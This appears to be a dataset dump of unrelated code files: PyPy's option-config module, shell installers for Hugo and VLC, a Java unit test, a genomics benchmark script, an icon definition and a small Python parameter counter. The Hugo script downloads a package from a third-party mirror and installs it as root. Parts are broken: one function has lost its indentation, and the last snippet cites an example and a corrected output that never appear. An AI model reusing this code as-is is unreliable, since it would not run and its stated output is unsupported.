text stringlengths 1 1.05M |
|---|
<filename>pypy/config/config.py
import py
import optparse
from pypy.tool.pairtype import extendabletype
# Re-exported so callers can suppress the usage line without importing optparse.
SUPPRESS_USAGE = optparse.SUPPRESS_USAGE
class AmbigousOptionError(Exception):
    """Raised by Config.set() when a dotted-path suffix matches more than
    one option.  (Misspelling of "ambiguous" kept: the name is public API.)"""
    pass
class NoMatchingOptionFound(AttributeError):
    """Raised by Config.set() when a key matches no option path.

    Subclasses AttributeError so callers using getattr-style probing
    can catch it uniformly."""
    pass
class ConfigError(Exception):
    """Base error for invalid option values."""
    pass
class ConflictConfigError(ConfigError):
    """Raised when a new value conflicts with one already set by a
    non-default, non-suggested owner."""
    pass
class Config(object):
    """A tree of configuration values shaped by an OptionDescription.

    Plain attribute access maps to option values (subgroups are nested
    Config instances); names starting with '_cfgimpl_' are internal
    bookkeeping stored directly in __dict__.  Each option value has an
    "owner" string ('default', 'suggested', 'user', 'required',
    'cmdline') that controls whether later writes may override it.
    Python 2 only (uses dict.iteritems).
    """
    # Class-level default; flipped per-instance by _freeze_().
    _cfgimpl_frozen = False

    def __init__(self, descr, parent=None, **overrides):
        """Build a Config for *descr*.

        *overrides* presets option values (keys may be dotted paths);
        *parent* links subgroup configs back to their enclosing Config.
        """
        self._cfgimpl_descr = descr
        self._cfgimpl_value_owners = {}
        self._cfgimpl_parent = parent
        self._cfgimpl_values = {}
        self._cfgimpl_warnings = []
        self._cfgimpl_build(overrides)

    def _cfgimpl_build(self, overrides):
        # Fill defaults for leaf options and recurse into subgroups,
        # then apply the caller-supplied overrides.
        for child in self._cfgimpl_descr._children:
            if isinstance(child, Option):
                self._cfgimpl_values[child._name] = child.getdefault()
                self._cfgimpl_value_owners[child._name] = 'default'
            elif isinstance(child, OptionDescription):
                self._cfgimpl_values[child._name] = Config(child, parent=self)
        self.override(overrides)

    def override(self, overrides):
        """Set options from a {dotted-path: value} mapping as owner 'default'."""
        for name, value in overrides.iteritems():
            homeconfig, name = self._cfgimpl_get_home_by_path(name)
            homeconfig.setoption(name, value, 'default')

    def copy(self, as_default=False, parent=None):
        """Return a copy of this Config (values shared, bookkeeping fresh).

        With as_default=True every owner is reset to 'default', making
        all values overridable again.
        """
        # __new__ skips __init__ so defaults are not recomputed.
        result = Config.__new__(self.__class__)
        result._cfgimpl_descr = self._cfgimpl_descr
        result._cfgimpl_value_owners = owners = {}
        result._cfgimpl_parent = parent
        result._cfgimpl_values = v = {}
        for child in self._cfgimpl_descr._children:
            if isinstance(child, Option):
                v[child._name] = self._cfgimpl_values[child._name]
                if as_default:
                    owners[child._name] = 'default'
                else:
                    owners[child._name] = (
                        self._cfgimpl_value_owners[child._name])
            elif isinstance(child, OptionDescription):
                v[child._name] = self._cfgimpl_values[child._name].copy(
                    as_default, parent=result)
        return result

    def __setattr__(self, name, value):
        # Frozen configs reject any change; during __init__ the class
        # attribute _cfgimpl_frozen (False) short-circuits this check.
        if self._cfgimpl_frozen and getattr(self, name) != value:
            raise TypeError("trying to change a frozen option object")
        if name.startswith('_cfgimpl_'):
            self.__dict__[name] = value
            return
        self.setoption(name, value, 'user')

    def __getattr__(self, name):
        # Dotted paths are resolved by walking down to the owning subgroup.
        if '.' in name:
            homeconfig, name = self._cfgimpl_get_home_by_path(name)
            return getattr(homeconfig, name)
        if name.startswith('_cfgimpl_'):
            # if it were in __dict__ it would have been found already
            raise AttributeError("%s object has no attribute %s" %
                                 (self.__class__, name))
        if name not in self._cfgimpl_values:
            raise AttributeError("%s object has no attribute %s" %
                                 (self.__class__, name))
        return self._cfgimpl_values[name]

    def __dir__(self):
        # Expose option names to dir()/tab-completion alongside the usual
        # class and instance attributes.
        from_type = dir(type(self))
        from_dict = list(self.__dict__)
        extras = list(self._cfgimpl_values)
        return sorted(set(extras + from_type + from_dict))

    def __delattr__(self, name):
        # XXX if you use delattr you are responsible for all bad things
        # happening
        if name.startswith('_cfgimpl_'):
            del self.__dict__[name]
            return
        # Reset the option to its (static) default and 'default' ownership.
        self._cfgimpl_value_owners[name] = 'default'
        opt = getattr(self._cfgimpl_descr, name)
        if isinstance(opt, OptionDescription):
            # NOTE(review): message reads like "can't delete option subgroup".
            raise AttributeError("can't option subgroup")
        self._cfgimpl_values[name] = getattr(opt, 'default', None)

    def setoption(self, name, value, who):
        """Set option *name* to *value* on behalf of owner *who*.

        A value already set by a "strong" owner (anything other than
        'default'/'suggested') may only be re-set to the same value, or
        be the target of a weak ('default'/'suggested') write, which is
        silently ignored; otherwise ConflictConfigError is raised.
        """
        if name not in self._cfgimpl_values:
            raise AttributeError('unknown option %s' % (name,))
        child = getattr(self._cfgimpl_descr, name)
        oldowner = self._cfgimpl_value_owners[child._name]
        if oldowner not in ("default", "suggested"):
            oldvalue = getattr(self, name)
            if oldvalue == value or who in ("default", "suggested"):
                return
            raise ConflictConfigError('cannot override value to %s for '
                                      'option %s' % (value, name))
        child.setoption(self, value, who)
        self._cfgimpl_value_owners[name] = who

    def suggest(self, **kwargs):
        """Suggest several option values at once (conflicts are ignored)."""
        for name, value in kwargs.items():
            self.suggestoption(name, value)

    def suggestoption(self, name, value):
        try:
            self.setoption(name, value, "suggested")
        except ConflictConfigError:
            # setting didn't work, but that is fine, since it is
            # suggested only
            pass

    def set(self, **kwargs):
        """Set options by (unambiguous) dotted-path suffix.

        Raises AmbigousOptionError for multiple matches and
        NoMatchingOptionFound for none.
        """
        all_paths = [p.split(".") for p in self.getpaths()]
        for key, value in kwargs.iteritems():
            key_p = key.split('.')
            # A key matches any full path that ends with its components.
            candidates = [p for p in all_paths if p[-len(key_p):] == key_p]
            if len(candidates) == 1:
                name = '.'.join(candidates[0])
                homeconfig, name = self._cfgimpl_get_home_by_path(name)
                homeconfig.setoption(name, value, "user")
            elif len(candidates) > 1:
                raise AmbigousOptionError(
                    'more than one option that ends with %s' % (key, ))
            else:
                raise NoMatchingOptionFound(
                    'there is no option that matches %s' % (key, ))

    def _cfgimpl_get_home_by_path(self, path):
        """returns tuple (config, name)"""
        path = path.split('.')
        for step in path[:-1]:
            self = getattr(self, step)
        return self, path[-1]

    def _cfgimpl_get_toplevel(self):
        # Walk parent links up to the root Config.
        while self._cfgimpl_parent is not None:
            self = self._cfgimpl_parent
        return self

    def add_warning(self, warning):
        """Record a warning on the toplevel config (shared by the tree)."""
        self._cfgimpl_get_toplevel()._cfgimpl_warnings.append(warning)

    def get_warnings(self):
        """Return the warnings recorded on the toplevel config."""
        return self._cfgimpl_get_toplevel()._cfgimpl_warnings

    def _freeze_(self):
        # RPython translation hook: freezing makes the object immutable.
        self.__dict__['_cfgimpl_frozen'] = True
        return True

    def getkey(self):
        """Return a hashable tuple-of-values key for the whole tree."""
        return self._cfgimpl_descr.getkey(self)

    def __hash__(self):
        return hash(self.getkey())

    def __eq__(self, other):
        # NOTE(review): assumes *other* is also a Config; no type check.
        return self.getkey() == other.getkey()

    def __ne__(self, other):
        return not self == other

    def __iter__(self):
        """Iterate (name, value) over the leaf options of this level only."""
        for child in self._cfgimpl_descr._children:
            if isinstance(child, Option):
                yield child._name, getattr(self, child._name)

    def __str__(self, indent=""):
        # Pretty-print only non-default values; subgroups have no owner
        # entry (get() -> None) so they are always descended into.
        lines = []
        children = [(child._name, child)
                    for child in self._cfgimpl_descr._children]
        children.sort()
        for name, child in children:
            if self._cfgimpl_value_owners.get(name, None) == 'default':
                continue
            value = getattr(self, name)
            if isinstance(value, Config):
                substr = value.__str__(indent + "    ")
            else:
                substr = "%s%s = %s" % (indent, name, value)
            if substr:
                lines.append(substr)
        if indent and not lines:
            return ''   # hide subgroups with all default values
        lines.insert(0, "%s[%s]" % (indent, self._cfgimpl_descr._name,))
        return '\n'.join(lines)

    def getpaths(self, include_groups=False):
        """returns a list of all paths in self, recursively
        """
        return self._cfgimpl_descr.getpaths(include_groups=include_groups)
# Sentinel meaning "derive the command-line name from the option's dotted path".
DEFAULT_OPTION_NAME = object()
class Option(object):
    """Abstract base class for a single (leaf) configuration option."""
    # extendabletype allows other pypy modules to add methods via __extend__.
    __metaclass__ = extendabletype

    def __init__(self, name, doc, cmdline=DEFAULT_OPTION_NAME):
        # cmdline: DEFAULT_OPTION_NAME (derive --flag from the path),
        # None (never exposed on the command line), or an explicit
        # space-separated list of option strings.
        self._name = name
        self.doc = doc
        self.cmdline = cmdline

    def validate(self, value):
        """Return True if *value* is acceptable; subclasses must override."""
        raise NotImplementedError('abstract base class')

    def getdefault(self):
        # Subclasses set self.default in their __init__.
        return self.default

    def setoption(self, config, value, who):
        """Validate and store *value* into config's value dict.

        A default of None is always accepted without validation so that
        "no default" options can exist.
        """
        name = self._name
        if who == "default" and value is None:
            pass
        elif not self.validate(value):
            raise ConfigError('invalid value %s for option %s' % (value, name))
        config._cfgimpl_values[name] = value

    def getkey(self, value):
        # Leaf options contribute their plain value to Config.getkey().
        return value

    def convert_from_cmdline(self, value):
        """Convert the raw optparse string; identity by default."""
        return value

    def add_optparse_option(self, argnames, parser, config):
        # self.opt_type is provided by concrete subclasses.
        callback = ConfigUpdate(config, self)
        option = parser.add_option(help=self.doc+" %default",
                                   action='callback', type=self.opt_type,
                                   callback=callback, metavar=self._name.upper(),
                                   *argnames)
class ChoiceOption(Option):
    """Option restricted to a fixed set of (string) values.

    *requires* / *suggests* map a chosen value to a list of
    (dotted-path, value) pairs that are forced / suggested on the rest
    of the config tree when that value is selected.
    """
    opt_type = 'string'

    def __init__(self, name, doc, values, default=None, requires=None,
                 suggests=None, cmdline=DEFAULT_OPTION_NAME):
        super(ChoiceOption, self).__init__(name, doc, cmdline)
        self.values = values
        self.default = default
        if requires is None:
            requires = {}
        self._requires = requires
        if suggests is None:
            suggests = {}
        self._suggests = suggests

    def setoption(self, config, value, who):
        name = self._name
        # First propagate hard requirements implied by *value* ...
        # (note: the loop variable deliberately shadows *name*; the
        # outer binding is not used afterwards)
        for path, reqvalue in self._requires.get(value, []):
            toplevel = config._cfgimpl_get_toplevel()
            homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
            if who == 'default':
                who2 = 'default'
            else:
                who2 = 'required'
            homeconfig.setoption(name, reqvalue, who2)
        # ... then soft suggestions, then store the value itself.
        for path, reqvalue in self._suggests.get(value, []):
            toplevel = config._cfgimpl_get_toplevel()
            homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
            homeconfig.suggestoption(name, reqvalue)
        super(ChoiceOption, self).setoption(config, value, who)

    def validate(self, value):
        return value is None or value in self.values

    def convert_from_cmdline(self, value):
        # Trim stray whitespace from the command line.
        return value.strip()
def _getnegation(optname):
if optname.startswith("without"):
return "with" + optname[len("without"):]
if optname.startswith("with"):
return "without" + optname[len("with"):]
return "no-" + optname
class BoolOption(Option):
    """Boolean option with optional requires/suggests side effects.

    Unlike ChoiceOption, *requires*/*suggests* are flat lists of
    (dotted-path, value) pairs applied only when the option is set to a
    true value.  *validator* is a callable run against the toplevel
    config when the option becomes true.
    """

    def __init__(self, name, doc, default=None, requires=None,
                 suggests=None, validator=None,
                 cmdline=DEFAULT_OPTION_NAME, negation=True):
        super(BoolOption, self).__init__(name, doc, cmdline=cmdline)
        self._requires = requires
        self._suggests = suggests
        self.default = default
        # negation: also create a --no-.../--without-... flag.
        self.negation = negation
        self._validator = validator

    def validate(self, value):
        return isinstance(value, bool)

    def setoption(self, config, value, who):
        name = self._name
        if value and self._validator is not None:
            toplevel = config._cfgimpl_get_toplevel()
            self._validator(toplevel)
        # Requirements become owner 'required' unless we are merely
        # applying defaults.
        if value and self._requires is not None:
            for path, reqvalue in self._requires:
                toplevel = config._cfgimpl_get_toplevel()
                homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
                if who == 'default':
                    who2 = 'default'
                else:
                    who2 = 'required'
                homeconfig.setoption(name, reqvalue, who2)
        if value and self._suggests is not None:
            for path, reqvalue in self._suggests:
                toplevel = config._cfgimpl_get_toplevel()
                homeconfig, name = toplevel._cfgimpl_get_home_by_path(path)
                homeconfig.suggestoption(name, reqvalue)
        super(BoolOption, self).setoption(config, value, who)

    def add_optparse_option(self, argnames, parser, config):
        # Positive flag sets the option to True ...
        callback = BoolConfigUpdate(config, self, True)
        option = parser.add_option(help=self.doc+" %default",
                                   action='callback',
                                   callback=callback, *argnames)
        if not self.negation:
            return
        # ... and a negated flag sets it to False.  Prefer negating the
        # long options; fall back to negating everything.
        no_argnames = ["--" + _getnegation(argname.lstrip("-"))
                       for argname in argnames
                       if argname.startswith("--")]
        if len(no_argnames) == 0:
            no_argnames = ["--" + _getnegation(argname.lstrip("-"))
                           for argname in argnames]
        callback = BoolConfigUpdate(config, self, False)
        # NOTE(review): *argname* here leaks out of the list comprehension
        # above -- Python 2 scoping only; this is a NameError on Python 3.
        option = parser.add_option(help="unset option set by %s %%default" % (argname, ),
                                   action='callback',
                                   callback=callback, *no_argnames)
class IntOption(Option):
    """Integer-valued option."""
    opt_type = 'int'

    def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
        super(IntOption, self).__init__(name, doc, cmdline)
        self.default = default

    def validate(self, value):
        # int() raises ValueError for unparsable strings (e.g. "abc")
        # and TypeError for non-numeric objects; both mean "invalid".
        # The original caught only TypeError, letting ValueError escape.
        try:
            int(value)
        except (TypeError, ValueError):
            return False
        return True

    def setoption(self, config, value, who):
        # Coerce to int; surface any conversion failure as a ConfigError
        # so callers see one uniform error type.
        try:
            super(IntOption, self).setoption(config, int(value), who)
        except (TypeError, ValueError) as e:
            raise ConfigError(*e.args)
class FloatOption(Option):
    """Float-valued option."""
    opt_type = 'float'

    def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
        super(FloatOption, self).__init__(name, doc, cmdline)
        self.default = default

    def validate(self, value):
        # float() raises ValueError for unparsable strings (e.g. "abc")
        # and TypeError for non-numeric objects; both mean "invalid".
        # The original caught only TypeError, letting ValueError escape.
        try:
            float(value)
        except (TypeError, ValueError):
            return False
        return True

    def setoption(self, config, value, who):
        # Coerce to float; surface any conversion failure as a ConfigError
        # so callers see one uniform error type.
        try:
            super(FloatOption, self).setoption(config, float(value), who)
        except (TypeError, ValueError) as e:
            raise ConfigError(*e.args)
class StrOption(Option):
    """String-valued option."""
    opt_type = 'string'

    def __init__(self, name, doc, default=None, cmdline=DEFAULT_OPTION_NAME):
        super(StrOption, self).__init__(name, doc, cmdline)
        self.default = default

    def validate(self, value):
        return isinstance(value, str)

    def setoption(self, config, value, who):
        # Mirror the Int/Float pattern of converting TypeError to
        # ConfigError (defensive; the base setoption rarely raises it).
        try:
            super(StrOption, self).setoption(config, value, who)
        except TypeError, e:
            raise ConfigError(*e.args)
class ArbitraryOption(Option):
    """Option holding an arbitrary Python object.

    Never exposed on the command line; the default may be produced
    lazily by *defaultfactory* (mutually exclusive with *default*).
    """

    def __init__(self, name, doc, default=None, defaultfactory=None):
        super(ArbitraryOption, self).__init__(name, doc, cmdline=None)
        self.default = default
        self.defaultfactory = defaultfactory
        if defaultfactory is not None:
            assert default is None

    def validate(self, value):
        # Any value is acceptable.
        return True

    def add_optparse_option(self, *args, **kwargs):
        # Arbitrary objects cannot come from the command line.
        return

    def getdefault(self):
        if self.defaultfactory is None:
            return self.default
        return self.defaultfactory()
class OptionDescription(object):
    """A named group of Options and nested OptionDescriptions.

    Children are also exposed as attributes on the description itself
    (see _build), which Config relies on via getattr(self._cfgimpl_descr,
    name).
    """
    __metaclass__ = extendabletype
    # Groups themselves never map to a command-line flag.
    cmdline = None

    def __init__(self, name, doc, children):
        self._name = name
        self.doc = doc
        self._children = children
        self._build()

    def _build(self):
        for child in self._children:
            setattr(self, child._name, child)

    def getkey(self, config):
        # Hashable key: tuple of the children's keys, in declaration order.
        return tuple([child.getkey(getattr(config, child._name))
                      for child in self._children])

    def add_optparse_option(self, argnames, parser, config):
        return

    def getpaths(self, include_groups=False, currpath=None):
        """returns a list of all paths in self, recursively
        currpath should not be provided (helps with recursion)
        """
        if currpath is None:
            currpath = []
        paths = []
        for option in self._children:
            attr = option._name
            if attr.startswith('_cfgimpl'):
                continue
            value = getattr(self, attr)
            if isinstance(value, OptionDescription):
                if include_groups:
                    paths.append('.'.join(currpath + [attr]))
                # currpath is mutated in place and restored after the
                # recursive call -- cheaper than copying per level.
                currpath.append(attr)
                paths += value.getpaths(include_groups=include_groups,
                                        currpath=currpath)
                currpath.pop()
            else:
                paths.append('.'.join(currpath + [attr]))
        return paths
class OptHelpFormatter(optparse.TitledHelpFormatter):
    """Help formatter that expands '%default' in option help strings with
    the current config value/owner and, for choice options, the list of
    allowed values."""
    # Extra text appended to the usage block; set by to_optparse().
    # NOTE: the misspelling "useage" is part of the de-facto API -- do
    # not rename without updating to_optparse().
    extra_useage = None

    def expand_default(self, option):
        assert self.parser
        dfls = self.parser.defaults
        defl = ""
        choices = None
        if option.action == 'callback' and isinstance(option.callback, ConfigUpdate):
            # Config-backed option: ask the callback for the live default.
            callback = option.callback
            defl = callback.help_default()
            if isinstance(callback.option, ChoiceOption):
                choices = callback.option.values
        else:
            # Plain optparse option: fall back to parser defaults.
            val = dfls.get(option.dest)
            if val is None:
                pass
            elif isinstance(val, bool):
                if val is True and option.action=="store_true":
                    defl = "default"
            else:
                defl = "default: %s" % val
            if option.type == 'choice':
                choices = option.choices
        if choices is not None:
            choices = "%s=%s" % (option.metavar, '|'.join(choices))
        else:
            choices = ""
        if '%default' in option.help:
            if choices and defl:
                sep = ", "
            else:
                sep = ""
            defl = '[%s%s%s]' % (choices, sep, defl)
            if defl == '[]':
                defl = ""
            return option.help.replace("%default", defl)
        elif choices:
            return option.help + ' [%s]' % choices
        return option.help

    def format_usage(self, usage):
        # XXX bit of a hack
        result = optparse.TitledHelpFormatter.format_usage(self, usage)
        if self.extra_useage is not None:
            return result + "\n" + self.extra_useage + "\n\n"
        return result
class ConfigUpdate(object):
    """optparse callback that writes a command-line value into a Config."""

    def __init__(self, config, option):
        self.config = config
        self.option = option

    def convert_from_cmdline(self, value):
        return self.option.convert_from_cmdline(value)

    def __call__(self, option, opt_str, value, parser, *args, **kwargs):
        # Signature dictated by optparse's 'callback' action.
        try:
            value = self.convert_from_cmdline(value)
            self.config.setoption(self.option._name, value, who='cmdline')
        except ConfigError, e:
            # This OptionValueError is going to exit the translate.py process.
            # Now is the last chance to print the warnings, which might give
            # more information... hack.
            import sys
            for warning in self.config.get_warnings():
                print >> sys.stderr, warning
            raise optparse.OptionValueError(e.args[0])

    def help_default(self):
        """Return 'owner: value' for the help text, or '' when the option
        is unset and still at its default."""
        default = getattr(self.config, self.option._name)
        owner = self.config._cfgimpl_value_owners[self.option._name]
        if default is None:
            if owner == 'default':
                return ''
            else:
                default = '???'
        return "%s: %s" % (owner, default)
class BoolConfigUpdate(ConfigUpdate):
    """ConfigUpdate for boolean flags: the flag itself carries the value
    (True for --opt, False for its negation), not the command line text."""

    def __init__(self, config, option, which_value):
        super(BoolConfigUpdate, self).__init__(config, option)
        self.which_value = which_value

    def convert_from_cmdline(self, value):
        # Ignore the raw value; this flag always means self.which_value.
        return self.which_value

    def help_default(self):
        current = getattr(self.config, self.option._name)
        owner = self.config._cfgimpl_value_owners[self.option._name]
        # Show the owner only when this flag matches the current value.
        return owner if current == self.which_value else ""
def to_optparse(config, useoptions=None, parser=None,
                parserargs=None, parserkwargs=None, extra_useage=None):
    """Build (or extend) an optparse parser from *config*.

    *useoptions* limits the exposed options to the given dotted paths;
    a trailing '.*' expands to every option below that group.  Returns
    the parser.
    """
    grps = {}
    def get_group(name, doc):
        # Group command-line options by the second-to-last path component.
        # NOTE(review): two different subgroups with the same last name
        # would share an option group here.
        steps = name.split('.')
        if len(steps) < 2:
            return parser
        grpname = steps[-2]
        grp = grps.get(grpname, None)
        if grp is None:
            grp = grps[grpname] = parser.add_option_group(doc)
        return grp
    if parser is None:
        if parserargs is None:
            parserargs = []
        if parserkwargs is None:
            parserkwargs = {}
        formatter = OptHelpFormatter()
        formatter.extra_useage = extra_useage
        parser = optparse.OptionParser(
            formatter=formatter,
            *parserargs, **parserkwargs)
    if useoptions is None:
        useoptions = config.getpaths(include_groups=True)
    seen = {}
    # The list is deliberately extended while being iterated: '.*'
    # wildcards append their expansion, which the loop then visits.
    for path in useoptions:
        if path.endswith(".*"):
            path = path[:-2]
            homeconf, name = config._cfgimpl_get_home_by_path(path)
            subconf = getattr(homeconf, name)
            children = [
                path + "." + child
                for child in subconf.getpaths()]
            useoptions.extend(children)
        else:
            if path in seen:
                continue
            seen[path] = True
            homeconf, name = config._cfgimpl_get_home_by_path(path)
            option = getattr(homeconf._cfgimpl_descr, name)
            if option.cmdline is DEFAULT_OPTION_NAME:
                # Derive '--group-subgroup-opt' from the dotted path.
                chunks = ('--%s' % (path.replace('.', '-'),),)
            elif option.cmdline is None:
                continue
            else:
                chunks = option.cmdline.split(' ')
            grp = get_group(path, homeconf._cfgimpl_descr.doc)
            option.add_optparse_option(chunks, grp, homeconf)
    return parser
def make_dict(config):
    """Flatten *config* into a {dotted-path: value} dictionary."""
    return dict((path, getattr(config, path)) for path in config.getpaths())
|
#!/bin/bash
# Install Hugo 0.88.1 on a Debian/Ubuntu system from a Coding.net public mirror.
mkdir hugo
cd hugo
# -f: fail on HTTP errors instead of saving the error page; -L: follow redirects.
curl -fL "https://coding-public-generic.pkg.coding.net/public/downloads/hugo-linux-64bit.deb?version=0.88.1" -o hugo-linux-64bit-0.88.1.deb
# './' prefix makes apt-get treat the argument as a local .deb file.
apt-get -y install ./hugo-linux-64bit-0.88.1.deb
cd ..
|
#!/bin/sh
# Install VLC from the n-muench PPA.
# NOTE(review): this PPA is quite old -- confirm it still serves packages
# for the target Ubuntu release before relying on this script.
sudo add-apt-repository ppa:n-muench/vlc
sudo apt-get update
sudo apt-get -y install vlc
|
/*
* Copyright 2017 LinkedIn Corp. Licensed under the BSD 2-Clause License (the "License"). See License in the project root for license information.
*/
package com.linkedin.kafka.cruisecontrol.model;
import com.linkedin.kafka.cruisecontrol.exception.ModelInputException;
import com.linkedin.kafka.cruisecontrol.monitor.sampling.Snapshot;
import java.util.List;
import org.junit.Test;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
/**
 * Unit tests for {@code Load}'s snapshot bookkeeping: exact-time lookup and
 * create-on-demand access, including ordering of the internal snapshot list.
 */
public class LoadTest {

    /** snapshotForTime returns the snapshot with the exact timestamp, or null. */
    @Test
    public void testSnapshotForTime() throws ModelInputException {
        Load load = new Load(3);
        Snapshot s1 = new Snapshot(5L);
        Snapshot s2 = new Snapshot(3L);
        Snapshot s3 = new Snapshot(1L);
        load.pushLatestSnapshot(s1);
        load.pushLatestSnapshot(s2);
        load.pushLatestSnapshot(s3);
        // Identity (==) is intentional: the same instances must be returned.
        assertTrue(load.snapshotForTime(5L) == s1);
        assertTrue(load.snapshotForTime(2L) == null);
        assertTrue(load.snapshotForTime(3L) == s2);
    }

    /**
     * getAndMaybeCreateSnapshot creates a snapshot on first access, keeps
     * snapshots sorted newest-first regardless of insertion order, and
     * returns the same instance on repeated calls.
     */
    @Test
    public void testGetAndMaybeCreateSnapshot() {
        Load load = new Load(3);
        Snapshot s1 = load.getAndMaybeCreateSnapshot(5L);
        Snapshot s2 = load.getAndMaybeCreateSnapshot(1L);
        Snapshot s3 = load.getAndMaybeCreateSnapshot(3L);
        assertEquals(3, load.numSnapshots());
        List<Snapshot> snapshots = load.snapshotsByTime();
        assertEquals(5L, snapshots.get(0).time());
        assertEquals(3L, snapshots.get(1).time());
        assertEquals(1L, snapshots.get(2).time());
        assertTrue(s1 == load.getAndMaybeCreateSnapshot(5L));
        assertTrue(s2 == load.getAndMaybeCreateSnapshot(1L));
        assertTrue(s3 == load.getAndMaybeCreateSnapshot(3L));
    }
}
|
#!/bin/bash
#Aim: to benchmark mode1b (well-based dataset with given SNPs)
# on cardelino dataset using 3 tools: bcftools (-R/-T), cellSNP,
# cellsnp-lite (-R/-T)
#Dependency: /usr/bin/time
# Abort on any error, including failures inside pipelines.
set -e
set -o pipefail
if [ $# -lt 2 ]; then
    echo "" >&2
    echo "This script is aimed to benchmark mode1b (well-based dataset with given" >&2
    echo "SNPs) on cardelino dataset using 3 tools: bcftools (-R/-T), cellSNP and" >&2
    echo "cellsnp-lite (-R/-T)." >&2
    echo "" >&2
    echo "Usage: $0 <repeat id> <ncore>" >&2
    echo "" >&2
    echo "<repeat id> i-th repeat, start from 1" >&2
    echo "<ncore> number of cores" >&2
    echo "" >&2
    exit 1
fi
i=$1     # i-th repeat
n=$2     # number of cores
work_dir=`cd $(dirname $0) && pwd`
prog=`basename $0`
# Load BIN_DIR/DATA_DIR/RES_DIR from the repo config unless already exported.
if [ -z "$BIN_DIR" ] || [ -z "$DATA_DIR" ] || [ -z "$RES_DIR" ]; then
    source $work_dir/../../config.sh > /dev/null
fi
# From here on, treat unset variables as errors.
set -u
run=1b_cardelino
util_dir=$work_dir/../utils
out_dir=$RES_DIR/$run/run
if [ ! -d "$out_dir" ]; then mkdir -p $out_dir; fi
echo "[I::$prog] Benchmark $run and output to '$out_dir' ..."
# Shared inputs and pileup thresholds for all three tools.
bam_lst=$DATA_DIR/cardelino/carde.bam.lst
sample_lst=$DATA_DIR/cardelino/carde.sample.lst
snp=$DATA_DIR/snp/genome1K.phase3.SNP_AF5e2.chr1toX.hg19.snp.uniq.vcf.gz
fasta=$DATA_DIR/fasta/cellranger.hg19.3.0.0.fa
cell_tag=None
umi_tag=None
min_mapq=20
min_count=1
min_maf=0
min_len=0
# Echo every command from here on (helps post-mortem of benchmark logs).
set -x
# run bcftools (-R/-T)
# A wrapper script is generated per run so that /usr/bin/time + memusg can
# measure the whole mpileup|view pipeline as a single child process.
for opt in -R -T; do
    res_dir=$out_dir/bcftools${opt}_${i}_$n
    if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
    echo "[I::$prog] bcftools$opt (repeat=$i; ncores=$n) to '$res_dir' ..."
    script=$res_dir/bcftools${opt}_${i}_${n}.sh
    echo "#!/bin/bash" > $script
    echo "set -eu" >> $script
    echo "set -o pipefail" >> $script
    echo "$BIN_DIR/bcftools mpileup \\" >> $script
    echo "    -b $bam_lst \\" >> $script
    echo "    -d 100000 \\" >> $script
    echo "    -f $fasta \\" >> $script
    echo "    -q $min_mapq \\" >> $script
    echo "    -Q 0 \\" >> $script
    echo "    --excl-flags 1796 \\" >> $script
    echo "    --incl-flags 0 \\" >> $script
    echo "    $opt $snp \\" >> $script
    echo "    -a AD,DP \\" >> $script
    echo "    -I \\" >> $script
    echo "    --threads $n \\" >> $script
    echo "    -Ou | \\" >> $script
    echo "$BIN_DIR/bcftools view \\" >> $script
    echo "    -i 'INFO/DP > 0' \\" >> $script
    echo "    -V indels \\" >> $script
    echo "    --threads $n \\" >> $script
    echo "    -Oz \\" >> $script
    echo "    -o $res_dir/bcftools.vcf.gz" >> $script
    echo "" >> $script
    chmod u+x $script
    /usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
        $script \
        > $res_dir/run.out 2> $res_dir/run.err
    # Let the system settle between timed runs.
    sleep 5
done
# run cellSNP
res_dir=$out_dir/cellSNP_${i}_$n
if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
echo "[I::$prog] cellSNP (repeat=$i; ncores=$n) to '$res_dir' ..."
# cellSNP takes a comma-separated sample string, not a list file.
samples=`cat $sample_lst | tr '\n' ',' | sed 's/,$//'`
/usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
    $BIN_DIR/cellSNP \
    -S $bam_lst \
    -I $samples \
    -O $res_dir \
    -R $snp \
    -p $n \
    --cellTAG $cell_tag \
    --UMItag $umi_tag \
    --minCOUNT $min_count \
    --minMAF $min_maf \
    --minLEN $min_len \
    --minMAPQ $min_mapq \
    --maxFLAG 255 \
    > $res_dir/run.out 2> $res_dir/run.err
sleep 5
# run cellsnp-lite (-R/-T)
# Flag thresholds mirror the bcftools run (--exclFLAG 1796 / --inclFLAG 0)
# so the three tools pile up the same reads.
for opt in -R -T; do
    res_dir=$out_dir/cellsnp-lite${opt}_${i}_$n
    if [ ! -d "$res_dir" ]; then mkdir -p $res_dir; fi
    echo "[I::$prog] cellsnp-lite$opt (repeat=$i; ncores=$n) to '$res_dir' ..."
    /usr/bin/time -v $BIN_DIR/python $util_dir/memusg -t -H \
        $BIN_DIR/cellsnp-lite \
        -S $bam_lst \
        -i $sample_lst \
        -O $res_dir \
        $opt $snp \
        -p $n \
        --cellTAG $cell_tag \
        --UMItag $umi_tag \
        --minCOUNT $min_count \
        --minMAF $min_maf \
        --minLEN $min_len \
        --minMAPQ $min_mapq \
        --exclFLAG 1796 \
        --inclFLAG 0 \
        --gzip \
        --genotype \
        > $res_dir/run.out 2> $res_dir/run.err
    sleep 5
done
echo "[I::$prog] Done!"
|
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.windows8 = void 0;
var windows8 = {
"viewBox": "0 0 16 16",
"children": [{
"name": "path",
"attribs": {
"fill": "#000000",
"d": "M0.005 8l-0.005-4.876 6-0.815v5.691zM7 2.164l7.998-1.164v7h-7.998zM15 9l-0.002 7-7.998-1.125v-5.875zM6 14.747l-5.995-0.822-0-4.926h5.995z"
}
}]
};
exports.windows8 = windows8; |
from typing import List, Tuple
def count_parameters(layers: List[Tuple[int, int, int]]) -> int:
    """Return the total number of trainable parameters in a stack of
    square-kernel convolutional layers.

    Each layer is given as (input_channels, output_channels, kernel_size);
    it contributes in*out*k^2 weights plus `out` bias terms.
    """
    return sum(
        in_ch * out_ch * kernel * kernel + out_ch
        for in_ch, out_ch, kernel in layers
    )

# Test the function with the provided example.
# (The previously claimed output of 118016 was wrong: the correct total is
# 1792 + 73856 + 295168 = 370816.)
